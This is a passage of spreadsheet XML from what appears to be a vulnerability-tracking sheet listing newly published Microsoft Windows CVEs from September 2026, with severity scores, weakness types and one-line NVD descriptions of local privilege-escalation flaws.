      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr"/>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q904" s="5" t="inlineStr"/>
      <c r="R904" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S904" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D905" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F905" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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05" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q905" s="5" t="inlineStr"/>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S905" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69292</t>
        </is>
      </c>
      <c r="D906" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F906" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q906" s="5" t="inlineStr"/>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S906" s="5" t="inlineStr">
        <is>
          <t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="D907" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F907" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q907" s="5" t="inlineStr"/>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S907" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="D908" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F908" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q908" s="5" t="inlineStr"/>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S908" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="D909" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F909" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q909" s="5" t="inlineStr"/>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S909" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="D910" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F910" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q910" s="5" t="inlineStr"/>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S910" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="D911" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F911" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q911" s="5" t="inlineStr"/>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S911" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D912" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F912" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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12" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q912" s="5" t="inlineStr"/>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S912" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="D913" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F913" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q913" s="5" t="inlineStr"/>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S913" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="D914" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F914" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr"/>
      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q914" s="5" t="inlineStr"/>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S914" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="D915" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F915" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q915" s="5" t="inlineStr"/>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S915" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="D916" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q916" s="5" t="inlineStr"/>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S916" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="D917" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q917" s="5" t="inlineStr"/>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S917" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D918" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F918" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q918" s="5" t="inlineStr"/>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S918" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="D919" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F919" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q919" s="5" t="inlineStr"/>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S919" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="D920" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F920" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q920" s="5" t="inlineStr"/>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S920" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="D921" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F921" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q921" s="5" t="inlineStr"/>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
